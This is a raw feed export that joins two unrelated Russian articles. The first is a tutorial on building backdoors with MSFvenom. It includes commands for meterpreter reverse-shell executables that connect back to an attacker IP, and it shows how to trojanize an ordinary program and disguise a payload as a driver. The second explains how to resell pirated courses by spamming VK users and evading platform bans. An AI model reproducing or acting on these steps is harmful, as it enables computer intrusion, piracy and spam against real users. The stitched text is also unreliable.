  &lt;p&gt;Статья не охватывает проблему доставки полезной нагрузки, инфицирования компьютера жертвы и вопросы предотвращения обнаружения, в том числе антивирусами. Главная цель этого материала – взглянуть на бэкдор глазами хакера для понимания принципов работы и значения угроз. Будет показано, как получить полный доступ над файловой системой, загружать или запускать любой файл, менять разнообразные системные настройки и даже выходить за пределы компьютера: делать снимки веб-камерой, делать видео- и аудио- захват с веб-камеры.&lt;/p&gt;
  &lt;p&gt;На протяжении все статьи будет постоянно употребляться термин «полезная нагрузка» (payload) и некоторые другие. Поэтому начнём с определения этих понятий.&lt;/p&gt;
  &lt;h3&gt;Что такое полезная нагрузка (payload)&lt;/h3&gt;
  &lt;p&gt;В статьях и учебниках по компьютерной безопасности можно часто встретить слово payload. Буквально оно переводится как «полезная нагрузка». Под этим словом подразумевают код или часть вредоносной программы (червей, вирусов), который непосредственно выполняет деструктивное действие: удаляет данные, отправляет спам, шифрует данные, открывает подключение для хакера и т.д. Вредоносные программы также имеют overhead code (буквально «служебный код»), под которым понимается та часть кода, которая отвечает за доставку на атакуемую машину, самостоятельное распространения вредоносной программы или препятствует обнаружению.&lt;/p&gt;
  &lt;p&gt;Т.е. «полезная нагрузка» для пользователя («жертвы») является совсем не полезной.&lt;/p&gt;
  &lt;p&gt;Для атакующего полезная нагрузка является ключевым элементом, который необходимо доставить на компьютер цели и выполнить. Код полезной нагрузки может быть написан самостоятельно (и это правильный подход, позволяющий значительно снизить шансы обнаружения антивирусами – в этом вы быстро убедитесь сами, если будете пробовать запускать исполнимые файлы с полезной нагрузкой в системах с установленным антивирусом), а можно воспользоваться разнообразными генераторами полезной нагрузки. Суть работы этих программ заключается в том, что вы выбираете типичную задачу (например, инициализация оболочки для ввода команд с обратным подключением), а генератор выдаёт вам исполнимый код под выбранную платформу. Если у вас нет навыков в программировании, то это единственный возможный вариант.&lt;/p&gt;
  &lt;p&gt;Одним из самых популярных генераторов полезной нагрузки является &lt;strong&gt;MSFvenom&lt;/strong&gt;. Это самостоятельная часть &lt;a href=&quot;https://kali.tools/?p=1551&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;Metasploit&lt;/strong&gt;&lt;/a&gt;, предназначенная для генерации полезной нагрузки.&lt;/p&gt;
  &lt;h3&gt;Что такое бэкдоры и трояны&lt;/h3&gt;
  &lt;p&gt;Бэкдор – это программа или технология, дающая несанкционированный доступ к компьютеру или другому устройству (роутер, телефон).&lt;/p&gt;
  &lt;p&gt;В нашем случае, генерируемая с помощью MSFvenom полезная нагрузка является бэкдором.&lt;/p&gt;
  &lt;p&gt;Троян – это программа, которая замаскирована под легитимную программу, но несёт в себе полезную нагрузку. Очень часто этой полезной нагрузкой является бэкдор.&lt;/p&gt;
  &lt;p&gt;Т.е. если мы к файлу программы «Калькулятор», добавили полезную нагрузку – это будет троянская программа с бэкдором. Если мы сгенерировали полезную нагрузку, разместили на компьютере цели и, например, добавили файл в автозагрузку – то это будет бэкдор.&lt;/p&gt;
  &lt;p&gt;Иногда термины троян и бэкдор используют как взаимозаменяемые. Антивирусные компании при наименовании вирусов обычно используют Trojan, даже если программа не маскируется под другую легитимную программу, а является чистым бэкдором, поскольку для доставления полезной нагрузки часто используется социальная инженерия – что вполне вписывается в концепцию Троянского Коня.&lt;/p&gt;
  &lt;p&gt;Для целей этой статьи классификация на трояны и бэкдоры неважна. &lt;strong&gt;MSFvenom &lt;/strong&gt;генерирует бэкдоры, но с ключом &lt;strong&gt;-x&lt;/strong&gt; (позволяющим указывать пользовательский исполнимый файл для использования в качестве шаблона) можно генерировать трояны, у которых в качестве полезной нагрузки будет бэкдор.&lt;/p&gt;
  &lt;h3&gt;Инструкция по использованию MSFvenom – генератора полезной нагрузки&lt;/h3&gt;
  &lt;p&gt;Msfvenom – это программа, которая комбинирует генерацию полезной нагрузки и кодирование. Она заменила две другие программы – &lt;strong&gt;msfpayload &lt;/strong&gt;и &lt;strong&gt;msfencode&lt;/strong&gt;, это произошло 8 июня 2015.&lt;/p&gt;
  &lt;p&gt;Знакомство с программой начнём со справки по её опциям.&lt;/p&gt;
  &lt;p&gt;Использование:&lt;/p&gt;
  &lt;blockquote&gt;/usr/bin/msfvenom [опции] &amp;lt;переменная=значение&amp;gt;&lt;/blockquote&gt;
  &lt;p&gt;Опции:&lt;/p&gt;
  &lt;blockquote&gt;-p, --payload &amp;lt;полезная нагрузка&amp;gt; Используемая полезная нагрузка. Укажите ‘-‘ или stdin для использования пользовательской полезной нагрузки&lt;br /&gt; --payload-options Показывает список опций для полезной нагрузки&lt;br /&gt;-l, --list [тип] Выводит список типов модулей. Опциями являются: payloads, encoders, nops, all&lt;br /&gt;-n, --nopsled &amp;lt;длина&amp;gt; Подготовить nopsled [длинной] к полезной нагрузке&lt;br /&gt;-f, --format &amp;lt;формат&amp;gt; Формат вывода (используйте --help-formats для вывода форматов)&lt;br /&gt; --help-formats Показать список доступных форматов&lt;br /&gt;-e, --encoder &amp;lt;инкодер&amp;gt; Кодировщик для использования&lt;br /&gt;-a, --arch Архитектура для использования&lt;br /&gt; --platform &amp;lt;платформа&amp;gt; Платформа полезной нагрузки&lt;br /&gt; --help-platforms Вывести списки платформ&lt;br /&gt;-s, --space &amp;lt;длина&amp;gt; Максимальная длина конечной полезной нагрузки&lt;br /&gt; --encoder-space &amp;lt;длина&amp;gt; Максимальная длина кодированной полезной нагрузки (по умолчанию используется значение из -s)&lt;br /&gt;-b, --bad-chars &amp;lt;список&amp;gt; Список символов, которые нужно избегать, пример: ‘/x00/xff‘&lt;br /&gt;-i, --iterations &amp;lt;счётчик&amp;gt; Количество раз кодирования полезной нагрузки&lt;br /&gt;-c, --add-code &amp;lt;путь&amp;gt; Укажите дополнительный файл шеллкода win32 для внедрения&lt;br /&gt;-x, --template &amp;lt;путь&amp;gt; Указать пользовательский исполнимый файл для использования в качестве шаблона&lt;br /&gt;-k, --keep Сохранить template behavior и вставить полезную нагрузку как новый поток&lt;br /&gt;-o, --out &amp;lt;путь&amp;gt; Сохранить полезную нагрузку&lt;br /&gt;-v, --var-name &amp;lt;имя&amp;gt; Укажите имя пользовательской переменной, которое будет использоваться для определенных форматов вывода&lt;br /&gt; --smallest Сгенерировать самую маленькую из возможных полезных нагрузок&lt;br /&gt;-h, --help Показать справку&lt;/blockquote&gt;
  &lt;p&gt;В справке упоминается nopsled, вы можете найти дополнительную информацию о NOP slide в Википедии (хотя для наших целей это неважно).&lt;/p&gt;
  &lt;h3&gt;Как создать полезную нагрузку&lt;/h3&gt;
  &lt;p&gt;Для генерации полезной нагрузки обязательными являются два флага: &lt;strong&gt;-p&lt;/strong&gt; and &lt;strong&gt;-f&lt;/strong&gt;.&lt;/p&gt;
  &lt;p&gt;Пример команды:&lt;/p&gt;
  &lt;blockquote&gt;msfvenom -p windows/meterpreter/reverse_tcp lhost=IP_атакующего lport=4444 -f exe -o /tmp/my_payload.exe&lt;/blockquote&gt;
  &lt;p&gt;Здесь:&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;&lt;strong&gt;-p windows/meterpreter/reverse_tcp&lt;/strong&gt; – выбранный тип полезной нагрузки&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;lhost=IP_атакующего&lt;/strong&gt; – адрес атакующего, для обратного соединения с компьютера жертвы&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;lport=4444&lt;/strong&gt; – порт, к которому будет делаться обратное соединение&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;-f exe&lt;/strong&gt; – формат полезной нагрузки (исполнимый файл Windows)&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;-o /tmp/my_payload.exe&lt;/strong&gt; – сохранить сгенерированный код в указанный файл&lt;/li&gt;
  &lt;/ul&gt;
  &lt;h3&gt;Виды полезной нагрузки MSFvenom&lt;/h3&gt;
  &lt;p&gt;Как уже было сказано, флаг &lt;strong&gt;-p&lt;/strong&gt; является обязательным. После него нужно указать то, чего мы хотим от полезной нагрузки.&lt;/p&gt;
  &lt;p&gt;Чтобы вывести список всех полезных нагрузок, которые поддерживает платформа Metasploit, выполните команду:&lt;/p&gt;
  &lt;blockquote&gt;msfvenom -l payloads&lt;/blockquote&gt;
  &lt;p&gt;Будет выведен такой список:&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://tgraph.io/file/e9204bccc2ca568365297.png&quot; width=&quot;1138&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Список длинный, включает в себя 486 пунктов (на момент написания) под самые разные платформы. Каждая запись состоит из двух столбцов: название полезной нагрузки (которое нужно указывать после опции &lt;strong&gt;-p&lt;/strong&gt;) и её краткое описание.&lt;/p&gt;
  &lt;p&gt;Название начинается с указания платформы, затем может идти используемая техника или архитектура, в самом конце будет указана основная цель полезной нагрузки. Например, запись &lt;strong&gt;windows/meterpreter/reverse_tcp&lt;/strong&gt; означает внедрение DLL сервера meterpreter через Reflective Dll Injection payload, с образованием обратного соединения до атакующего. Говоря простыми словами, будет создан реверсивный (обратный) шелл до атакующего, который позволит ему управлять целевым компьютером через &lt;strong&gt;meterpreter&lt;/strong&gt;.&lt;/p&gt;
  &lt;p&gt;Слово &lt;strong&gt;meterpreter &lt;/strong&gt;означает управление через Meterpreter (полное название Meta-Interpreter). Это многогранная программа, она является частью Metasploit с 2004. Работает она через dll внедрение. Скрипты и плагины загружаются и выгружаются динамически. Основы работы с Meterpreter будут раскрыты ниже.&lt;/p&gt;
  &lt;p&gt;Во многих названиях используются слова &lt;strong&gt;bind &lt;/strong&gt;и &lt;strong&gt;reverse&lt;/strong&gt;. Слово &lt;strong&gt;bind &lt;/strong&gt;означает, что на атакуемой машине процесс будет прослушивать определённый порт, ожидая, пока атакующий подключится к нему. А &lt;strong&gt;reverse &lt;/strong&gt;означает, что на атакуемой машине процесс программы сам инициализирует соединение до атакующего. Поскольку ногие файерволы настроены на разрешение исходящих соединений, то обратное (&lt;strong&gt;reverse&lt;/strong&gt;) соединение даёт шанс обойти файервол.&lt;/p&gt;
  &lt;p&gt;Ключевое слово &lt;strong&gt;vncinject &lt;/strong&gt;означает задействование технологии &lt;a href=&quot;https://ru.wikipedia.org/wiki/Virtual_Network_Computing&quot; target=&quot;_blank&quot;&gt;Virtual Network Computing (VNC)&lt;/a&gt; – удалённого доступа к рабочему столу.&lt;/p&gt;
  &lt;p&gt;Если в имени полезной нагрузки присутствует &lt;strong&gt;upexec&lt;/strong&gt;, значит её цель загрузить и выполнить исполнимый файл.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;shell &lt;/strong&gt;означает открытие командной оболочки.&lt;/p&gt;
  &lt;p&gt;Ключевое слово &lt;strong&gt;dllinject &lt;/strong&gt;относится к технике Reflective DLL injection. При её использовании полезная нагрузка внедряется в запущенный процесс, прямо в оперативной памяти. При этом она никогда не касается жёстких дисков. Полезные нагрузки VNC и Meterpreter используют reflective DLL injection.&lt;/p&gt;
  &lt;p&gt;В самом конце обычно стоит указание на используемый для соединения протокол, им может быть: &lt;strong&gt;http&lt;/strong&gt;, &lt;strong&gt;https&lt;/strong&gt;, &lt;strong&gt;tcp&lt;/strong&gt;, &lt;strong&gt;ipv6_tcp&lt;/strong&gt;, &lt;strong&gt;tcp_dns&lt;/strong&gt;, &lt;strong&gt;winhttp&lt;/strong&gt;, &lt;strong&gt;winhttps &lt;/strong&gt;и другие варианты. Могут использоваться слова &lt;strong&gt;proxy &lt;/strong&gt;(соответственно, соединение через прокси), &lt;strong&gt;allports &lt;/strong&gt;(пробовать соединиться на всех возможных портах), &lt;strong&gt;uuid &lt;/strong&gt;(соединение с поддержкой UUID).&lt;/p&gt;
  &lt;p&gt;Имеется несколько специфичных полезных нагрузок:&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;&lt;strong&gt;windows/adduser&lt;/strong&gt;. Создаёт пользователя и добавляет его в группу локальных администраторов.&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;windows/dns_txt_query_exec&lt;/strong&gt;. Выполняет TXT запросы к ряду DNS записей и выполняет полученную полезную нагрузку.&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;windows/download_exec&lt;/strong&gt;. Загружает EXE с HTTP(S)/FTP URL и выполняет его.&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;windows/exec&lt;/strong&gt;. Выполняет произвольную команду.&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;windows/format_all_drives&lt;/strong&gt;. Форматирует все смонтированные в Windows диски (также известная как ShellcodeOfDeath). Если код по каким-либо причинам не может получить доступ к диску, то он пропускает диск и переходит к обработке следующего тома.&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;windows/loadlibrary&lt;/strong&gt;. Загружает библиотеку по произвольному пути.&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;windows/messagebox&lt;/strong&gt;. Показывает диалоговое сообщение через MessageBox, используя настраиваемый заголовок, текст и иконку.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p&gt;По принципу работы, полезную нагрузку можно разделить на два типа:&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;«выстрелил и забыл» (может быть доставлена, например, на USB носителе, не требует сетевого соединения)&lt;/li&gt;
    &lt;li&gt;требующую дополнительных действий пользователя после запуска&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p&gt;К «выстрелил и забыл» можно отнести форматирование всех дисков, выполнение определённых команд, создание нового пользователя.&lt;/p&gt;
  &lt;p&gt;Большую группу составляют полезные нагрузки, открывающие доступ к оболочке, серверу meterpreter – после их запуска пользователь должен к ним подключиться для выполнения команд.&lt;/p&gt;
  &lt;h3&gt;Как узнать опции полезной нагрузки MSFvenom&lt;/h3&gt;
  &lt;p&gt;У многих полезных нагрузок имеются опции. Для их показа применяется флаг &lt;strong&gt;--payload-options&lt;/strong&gt;. Также нужно использовать флаг &lt;strong&gt;-p&lt;/strong&gt;, после которого нужно указать название интересующей полезной нагрузки.&lt;/p&gt;
  &lt;p&gt;Примеры&lt;/p&gt;
  &lt;blockquote&gt;msfvenom -p windows/messagebox --payload-options&lt;/blockquote&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://tgraph.io/file/028a6f631baae17f1803d.png&quot; width=&quot;893&quot; /&gt;
  &lt;/figure&gt;
  &lt;blockquote&gt;msfvenom -p windows/meterpreter/reverse_tcp --payload-options&lt;/blockquote&gt;
  &lt;p&gt;Будет выведено:&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://tgraph.io/file/9a942a7dc7e6d3a469c0e.png&quot; width=&quot;1077&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Ниже будет ещё больше текста. Чтобы не захламлять статью я не стал его показывать полностью.&lt;/p&gt;
  &lt;p&gt;Столбец &lt;strong&gt;Required &lt;/strong&gt;показывает, является ли опция обязательной. Для некоторых опций предусмотрено значение по умолчанию. Если для обязательной опции отсутствует значение по умолчанию, то его нужно указать при генерации полезной нагрузки. Например, для &lt;strong&gt;windows/meterpreter/reverse_tcp&lt;/strong&gt; нужно обязательно указать &lt;strong&gt;LHOST&lt;/strong&gt;.&lt;/p&gt;
  &lt;p&gt;Вспомним наш пример:&lt;/p&gt;
  &lt;blockquote&gt;msfvenom -p windows/meterpreter/reverse_tcp lhost=IP_атакующего lport=4444 -f exe -o /tmp/my_payload.exe&lt;/blockquote&gt;
  &lt;p&gt;В нём &lt;strong&gt;lport=4444&lt;/strong&gt; можно было не указывать, поскольку всё равно применяется значение по умолчанию. А опция &lt;strong&gt;LHOST &lt;/strong&gt;установлена как «&lt;strong&gt;lhost=IP_атакующего&lt;/strong&gt;».&lt;/p&gt;
  &lt;h3&gt;Форматы полезной нагрузки&lt;/h3&gt;
  &lt;p&gt;Как уже было сказано, вторым обязательным флагом является &lt;strong&gt;-f&lt;/strong&gt;. Он устанвливает формат полезной нагрузки.&lt;/p&gt;
  &lt;p&gt;Чтобы вывести список всех поддерживаемых форматов, выполните команду:&lt;/p&gt;
  &lt;blockquote&gt;msfvenom --help-formats&lt;/blockquote&gt;
  &lt;p&gt;Будет выведено:&lt;/p&gt;
  &lt;blockquote&gt;Executable formats&lt;br /&gt; asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, jsp, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-cmd, psh-net, psh-reflection, vba, vba-exe, vba-psh, vbs, war&lt;br /&gt;Transform formats&lt;br /&gt; bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript&lt;/blockquote&gt;
  &lt;h3&gt;Примеры генерации полезной нагрузки в MSFvenom&lt;/h3&gt;
  &lt;p&gt;Один из популярных вариантов создания полезной нагрузки под Windows уже показан выше:&lt;/p&gt;
  &lt;blockquote&gt;msfvenom -p windows/meterpreter/reverse_tcp lhost=IP_атакующего lport=4444 -f exe -o backdoor.exe&lt;/blockquote&gt;
  &lt;p&gt;Чтобы узнать ваш IP адрес, вы можете, например, воспользоваться командой&lt;/p&gt;
  &lt;blockquote&gt;ip a&lt;/blockquote&gt;
  &lt;p&gt;Чтобы узнать внешний IP:&lt;/p&gt;
  &lt;blockquote&gt;curl suip.biz/ip/&lt;/blockquote&gt;
  &lt;p&gt;Поскольку я моделирую атаку в локальной сети, то я буду использовать локальный IP компьютера с Kali Linux (192.168.0.196):&lt;/p&gt;
  &lt;blockquote&gt;msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.196 lport=4444 -f exe -o backdoor.exe&lt;/blockquote&gt;
  &lt;p&gt;Программа выведет:&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://tgraph.io/file/6721b67140b68d8c1e52d.png&quot; width=&quot;1033&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;И будет создан файл backdoor.exe.&lt;/p&gt;
  &lt;p&gt;Можно комбинировать несколько полезных нагрузок. Это позволяет сделать опция &lt;strong&gt;-c&lt;/strong&gt;, которая указывает на файл с шеллколом win32, который должен быть включён в создаваемую полезную нагрузку.&lt;/p&gt;
  &lt;p&gt;Пример:&lt;/p&gt;
  &lt;blockquote&gt;msfvenom -p windows/messagebox ICON=&amp;quot;INFORMATION&amp;quot; TITLE=&amp;quot;Compatibility test&amp;quot; TEXT=&amp;quot;The test is processed&amp;quot; -f raw -o mes1&lt;/blockquote&gt;
  &lt;p&gt;Мы использовали полезную нагрузку &lt;strong&gt;windows/messagebox&lt;/strong&gt; (создаёт диалоговое окно), эта полезная нагрузка без кодирования (&lt;strong&gt;-f raw&lt;/strong&gt;) была сохранена в файл mes1.&lt;/p&gt;
  &lt;p&gt;Далее мы вновь используем &lt;strong&gt;windows/messagebox&lt;/strong&gt;, и без кодирования сохраняем в файл mes2. После ключа &lt;strong&gt;-c&lt;/strong&gt; мы указываем файл (mes1), который должен быть включён в создаваемую полезную нагрузку.&lt;/p&gt;
  &lt;blockquote&gt;msfvenom -c mes1 -p windows/messagebox ICON=&amp;quot;ERROR&amp;quot; TITLE=&amp;quot;Error&amp;quot; TEXT=&amp;quot;Missing necessary files&amp;quot; -f raw -o mes2&lt;/blockquote&gt;
  &lt;p&gt;Наконец, уже знакомая нам команда по созданию исполнимого файла, обратите внимание на опцию &lt;strong&gt;-c mes2&lt;/strong&gt;, ей мы добавляем в создаваемый бинарник ранее сгенерированный файл mes2, который уже содержит mes1:&lt;/p&gt;
  &lt;blockquote&gt;msfvenom -c mes2 -p windows/meterpreter/reverse_tcp lhost=192.168.0.196 lport=4444 -f exe -o driver_dlya_tvoego_computera.exe&lt;/blockquote&gt;
  &lt;p&gt;Будет создан файл driver_dlya_tvoego_computera.exe, который при запуске покажет два окна и после этого попытается подключиться к удалённому компьютеру.&lt;/p&gt;
  &lt;p&gt;Опция &lt;strong&gt;-x&lt;/strong&gt; позволяет указать существующий исполнимый файл (шаблон). Это можно делать для уменьшения подозрения пользователя (исполнимый файл может выполнять полезную для пользователя функцию), либо таким образом можно попытаться заменить уже существующий в системе файл.&lt;/p&gt;
  &lt;p&gt;Опция &lt;strong&gt;-k&lt;/strong&gt; вместе с предыдущей сохранит нормальное поведение шаблона, и внедрённая полезная нагрузка будет выполняться как отдельный поток:&lt;/p&gt;
  &lt;blockquote&gt;msfvenom -a x86 --platform windows -x sol.exe -k -p windows/messagebox lhost=192.168.101.133 -b &amp;quot;/x00&amp;quot; -f exe -o sol_bdoor.exe&lt;/blockquote&gt;

</content></entry><entry><id>hiddencommunity:gnf0fGZhJ</id><link rel="alternate" type="text/html" href="https://teletype.in/@hiddencommunity/gnf0fGZhJ?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=hiddencommunity"></link><title>Зарабатываем 10к в день на перепродажах</title><published>2020-06-08T17:04:02.435Z</published><updated>2020-06-08T17:04:02.435Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/4e/55/4e55f593-cfb4-4e61-b9fa-c2f35428a0d7.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/a7/21/a721cf28-277f-4dce-aa45-d3cf19dd2db8.jpeg&quot;&gt;Итак, сегодня расскажу вам про то, как я поднимал по 10к в день на пассиве. Для такого результата нужно хорошо поработать, но оно того стоит. Если у меня вышло, то у вас точно получится. Зарабатывать мы будем на перепродаже инфотоваров (не спеши возмущаться, тема хорошо доработана с выходом на пассив).</summary><content type="html">
  &lt;figure class=&quot;m_retina&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/a7/21/a721cf28-277f-4dce-aa45-d3cf19dd2db8.jpeg&quot; width=&quot;960&quot; /&gt;
  &lt;/figure&gt;
  &lt;h3&gt;Предисловие&lt;/h3&gt;
  &lt;p&gt;Итак, сегодня расскажу вам про то, как я поднимал по 10к в день на пассиве. Для такого результата нужно хорошо поработать, но оно того стоит. Если у меня вышло, то у вас точно получится. Зарабатывать мы будем на перепродаже инфотоваров (не спеши возмущаться, тема хорошо доработана с выходом на пассив).&lt;/p&gt;
  &lt;h3&gt;Модернизация и монетизация&lt;/h3&gt;
  &lt;p&gt;Возможно, кто-то из вас помнит тему, где продавали слитые курсы. Если кто не знает, вкратце: находим инфобизнесменов (вк, инста) и начинаем рассылать их подписчикам сообщения по ЛС с предложением купить слитые курсы подешевле. Т.к. курсы стоили по 50-100к, на предложение взять за 1000₽ охотно соглашались. Однако приходилось переписываться с каждым отдельно и постоянно менять аккаунты. Сейчас же правила в вк и инсте стали еще жестче, и в большинстве случаев аккаунт блокировали насовсем, а клиенты терялись, не дойдя до покупки.&lt;/p&gt;
  &lt;p&gt;Соответственно встала задача перенаправить наших потенциальных клиентов во избежание бана, а также автоматизировать продажи, ибо переписываться с каждым отдельно – можно сойти с ума.&lt;/p&gt;
  &lt;p&gt;Самым простым решением оказалось создание автоматизированного телеграм-бота для продаж и перенаправление клиентов сразу туда. Я не стал заморачиваться и использовал чужого бота, однако самый профитный вариант - сделать своего (понадобятся вложения и терпение).&lt;/p&gt;
  &lt;h3&gt;Создание своего бота&lt;/h3&gt;
  &lt;p&gt;В первую очередь нам потребуется сам бот – можете поискать сливы на форумах или заказать на фрилансе. На фрилансе такой бот обойдется в 5-10 тысяч, но там все объяснят и повесят сразу на хост. Если же решили искать по сливам – нам потребуется хостинг (желательно не РФ, т.к. у многих инфоцыган (типа БМ или skillbox) имеются хорошие юристы, которые в случае чего начнут жаловаться на хостинг). Как приобрести и использовать хостинг, объяснять не буду – интернет в помощь.&lt;/p&gt;
  &lt;p&gt;Также понадобится домен (как его купить, тоже объяснять не буду, можете взять здесь (не реклама) – &lt;a href=&quot;https://www.reg.ru/&quot; target=&quot;_blank&quot;&gt;reg.ru&lt;/a&gt;, &lt;a href=&quot;https://www.nic.ru/&quot; target=&quot;_blank&quot;&gt;nic.ru&lt;/a&gt;).&lt;/p&gt;
  &lt;p&gt;Далее идем в &lt;a href=&quot;https://telete.in/BotFather&quot; target=&quot;_blank&quot;&gt;BotFather&lt;/a&gt;, вводим название и ссылку, получаем API, меняем в коде бота API на наш (если искали по сливам, там должно быть указано).&lt;/p&gt;
  &lt;p&gt;Прикручиваем домен к хостингу (может занять до 48ч), заливаем на хост нашего бота, заполняем товарами, прикручиваем реквизиты оплаты (тут подробней описать не могу, зависит от того, что за бот у вас. Если нашли сливы – там должно быть указано, если делаете сами – можете использовать просто oplata.info или qiwi (потребуется, соответственно, API Qiwi), готово.&lt;/p&gt;
  &lt;p&gt;Я специально об этом не говорил подробно, ибо сам использовал просто другого бота, а те, кто хочет сделать своего – сами могут разобраться, вся инфа в открытом доступе, напрягите пальцы и погуглите, мы тут разбираем только ценную инфу.&lt;/p&gt;
  &lt;h3&gt;Способы добычи трафика&lt;/h3&gt;
  &lt;p&gt;1. Самый оптимальный – рассылка сообщений по комментариям ВК. Дает наибольший охват. Для начала можно вручную. Берем нашу реферальную ссылку, сокращаем, выбираем курс, ищем автора в вк и начинаем в тупую слать по комментариям к новым постам (к примеру, у Аяза на постах в среднем 100к просмотров, если успеть к выходу поста прокомментировать – Вы можете поймать этот трафик. Для избежания бана в ссылке можно сделать пробел и указывать, мол «удаляйте пробел», либо сделать изображение, где указать ссылку и рассылать изображение. Для рандомизации текста можно менять раскладку и изменять одинаковые символы английскими (к примеру, русскую «р» на английскую «p» и т.д.).&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Вот инфоцыгане, по которым я работал:&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;https://vk.com/mariyasolodar&quot; target=&quot;_blank&quot;&gt;https://vk.com/mariyasolodar&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;https://vk.com/geekbrainsru&quot; target=&quot;_blank&quot;&gt;https://vk.com/geekbrainsru&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;https://vk.com/netology&quot; target=&quot;_blank&quot;&gt;https://vk.com/netology&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;https://vk.com/enjoymaloy&quot; target=&quot;_blank&quot;&gt;https://vk.com/enjoymaloy&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;https://vk.com/molodost_bz&quot; target=&quot;_blank&quot;&gt;https://vk.com/molodost_bz&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;https://vk.com/ayazshabutdinov&quot; target=&quot;_blank&quot;&gt;https://vk.com/ayazshabutdinov&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;https://vk.com/yy_rnd&quot; target=&quot;_blank&quot;&gt;https://vk.com/yy_rnd&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;https://vk.com/andrei_parabellum&quot; target=&quot;_blank&quot;&gt;https://vk.com/andrei_parabellum&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;https://vk.com/geniusmarketing&quot; target=&quot;_blank&quot;&gt;https://vk.com/geniusmarketing&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;https://vk.com/skillbox_education&quot; target=&quot;_blank&quot;&gt;https://vk.com/skillbox_education&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;Вам советую найти своих, просто шарьте по сливам и найдете своего цыгана, с которого заработаете максимум. Тут главное пробовать. Если немного вложиться – можно закупить аккаунтов вк.&lt;/p&gt;
  &lt;p&gt;Также понадобится ipv4 прокси для вк и ipv6, если работаете по инстаграм (об этом позже). Я арендую ipv4 shared прокси на proxyline.net на 5 дней – выходит 18р за шт (используйте промокод на первую покупку, он висит на главной странице сайта).&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://tgraph.io/file/d7c16cbed1da676821fa1.png&quot; width=&quot;1057&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Далее понадобится софт. Я использую первонах-скрипты (оставляют первый комментарий под постом, погуглите, полно слитых) и софт для рассылки сообщений (юзаю poster pro, т.к. лицензуха на месяц стоит 20р, не реклама. Может багать – качайте в таком случае предыдущую версию).&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://tgraph.io/file/8504a8b261678aad69a91.png&quot; width=&quot;895&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Собираем аудиторию инфоцыган, загружаем аккаунты, прокси (на один аккаунт желательно один прокси) и начинаем рассылку (по комментариям и по лс). Иногда можете рассылать просто эту схему, заменяя ссылку на свою. Способы придумайте сами.&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://tgraph.io/file/c48f95ec8e3e39281fe17.png&quot; width=&quot;896&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Однако самый быстрый и действенный способ (соответственно, самый дорогой) – таргетированная реклама вк и инстаграм&lt;/p&gt;
  &lt;p&gt;Вот мои нескромные результаты только по одному сообществу вк:&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://tgraph.io/file/6281ae9ca7653e1023d44.png&quot; width=&quot;1159&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Как видите CTR целых 3.6%! И это еще не лучший результат. В тот же день у меня купили курсов на 6к.&lt;/p&gt;
